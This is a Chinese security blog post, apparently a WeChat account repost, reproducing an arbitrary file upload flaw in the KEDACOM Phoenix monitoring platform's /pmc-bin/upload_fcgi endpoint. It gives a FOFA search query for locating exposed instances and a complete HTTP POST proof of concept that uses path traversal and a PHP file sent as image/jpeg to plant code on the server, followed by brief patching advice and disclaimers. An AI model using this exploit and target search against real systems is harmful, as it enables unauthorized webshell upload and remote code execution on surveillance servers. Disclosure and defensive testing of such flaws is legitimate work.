文章总结： KEDACOMPhoenix监控平台/pmc-bin/upload_fcgi接口存在任意文件上传漏洞，攻击者可绕过检查上传Webshell导致远程代码执行。建议立即升级系统、配置WAF拦截异常请求并限制接口访问权限以修复风险。 综合评分： 82 文章分类： 漏洞POC,漏洞分析,WEB安全

漏洞复现|KEDACOM Phoenix监控平台存在upload_fcgi接口任意文件上传漏洞

原创

小白菜安全

小白菜安全

2025年12月28日 13:43 浙江

漏洞描述

该漏洞存在于Phoenix监控平台的/pmc-bin/upload_fcgi接口，攻击者可利用此接口绕过文件类型检查，上传任意文件（如WebShell、恶意脚本等），进而实现远程代码执行，控制服务器权限。

资产信息

fofa:app=”kedacom-phoenix监控平台”

漏洞复现

POC

POST /pmc-bin/upload_fcgi?uploaddir=../&uploadname=test.php HTTP/1.1Host: [目标IP]Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXXXXXXContent-Length: [内容长度]
----WebKitFormBoundaryXXXXXXContent-Disposition: form-data; name="filedata"; filename="test.php"Content-Type: image/jpeg
<?php&nbsp;echo&nbsp;"Vulnerable"; @unlink(__FILE__);&nbsp;?>----WebKitFormBoundaryXXXXXX--

修复

1.联系厂商获取安全补丁或升级至最新版本。2.配置Web应用防火墙（WAF），拦截异常文件上传请求。3.限制upload_fcgi接口的访问权限，仅允许信任来源访问。4.关闭不必要的互联网暴露面，减少攻击面。

免责声明

该公众号主要是分享互联网上公开的一些漏洞poc和工具，利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，本公众号及作者不为此承担任何责任，一旦造成后果请自行承担！如果本公众号分享导致的侵权行为请告知，我们会立即删除并道歉。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：小白菜安全 小白菜安全《漏洞复现|KEDACOM Phoenix监控平台存在upload_fcgi接口任意文件上传漏洞》